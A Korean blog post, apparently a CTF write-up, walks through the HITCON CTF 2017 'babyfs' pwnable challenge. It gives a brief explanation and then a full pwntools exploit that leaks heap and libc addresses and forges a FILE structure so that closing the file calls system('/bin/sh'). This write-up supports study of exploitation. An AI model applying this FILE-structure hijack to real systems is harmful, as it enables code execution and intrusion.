-
HITCON CTF 2017 babyfsPwnable/CTF 2018. 1. 30. 19:45
처음 문제를 잡았을때 어떤식으로 접근해야되는지 모르겠어서 /dev/fd/0을 open 하면 입력을 할수있다는것을 Write up에서 참고하고 문제를 풀었다.
/dev/fd/0(/dev/stdin) 을 오픈하면 dup(0)과같은 현상이 일어나서 입력을 받을수 있다.
open을하고 fseek 과같이 파일 사이즈를 확인하는 함수에서는 /dev/fd/0파일을 open할때 오류가나서 -1을 반환하기때문에 오버플로우를 할수있다.
sendline을 할때 enter값이 stdin 버퍼에 아직 남아가지고 그것도 같이 복사를 해주는것때문에 -1,-2를 해주지 않으면 값이 내가 원하는것보다 더 많이 들어가버린다.
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100from pwn import *import structdef fopen(name):p.sendlineafter('choice: ','1')p.sendlineafter(':',name)def fread(idx,size):p.sendlineafter('choice: ','2')p.sendlineafter(':',str(idx))p.sendlineafter(':',str(size))def fwrite(idx):p.sendlineafter('choice: ','3')p.sendlineafter(':',str(idx))def fclose(idx):p.sendlineafter('choice: ','4')p.sendlineafter(':',str(idx))heap = ''libc = ''p = process('./babyfs.bin')fopen('/dev/fd/0') #0fopen('/dev/fd/1')idx = 0j = 1for i in range(0x98,0x9e):payload = 'A'*(24-idx)payload += p64(0x231)payload += p64(0xfbad2488)fread(0,len(payload)+j)sleep(2)p.sendline(payload+struct.pack('<B',i))fread(1,8)fwrite(1)p.recvuntil(':')p.recv(1)heap += p.recv(1)fclose(1)fopen('/dev/fd/1')idx = 1j = 2print heap.encode('hex')heap = u64(heap+'\x00\x00') - 0xf0print hex(heap)for i in range(0x78,0x7e):payload = 'A'*23payload += p64(0x231)payload += p64(0xfbad2488)fread(0,len(payload)+j)sleep(1)p.sendline(payload+struct.pack('<B',i))fread(1,8)fwrite(1)p.recvuntil(':')p.recv(1)libc += p.recv(1)print libc.encode('hex')fclose(1)fopen('/dev/fd/1')libc_base = u64(libc+'\x00\x00') - 0x3c5540system = libc_base + 0x45390print hex(libc_base)print hex(system)sleep(1)payload = 'A'*23payload += p64(0x231)payload += '/bin/sh\x00'payload += p64(heap+0x14a0) * 7payload += p64(heap+0x18a0)payload += p64(0) * 4payload += p64(heap + 0x10)payload += p64(4) + p64(0)*2 + p64(heap + 0x1350)payload += p64(0xffffffffffffffff)payload += p64(0)payload += p64(heap + 0x1360)payload += p64(0)*6payload += p64(heap + 0x1350)payload += p64(0) * 17payload += p64(system) #__GI__IO_file_closefread(0,len(payload)+2)p.sendline(payload)p.interactive()fclose(1)p.interactive()cs 'Pwnable > CTF' 카테고리의 다른 글
Codegate 2018 SuperFTP (0) 2018.02.05 HITCON CTF 2017 ragnarok (0) 2018.02.01 defcon 2016 pillpusher (1) 2018.01.24 insomnihack CTF 2018 sapeloshop (0) 2018.01.23 Codegate 2017 Final building_owner (0) 2018.01.21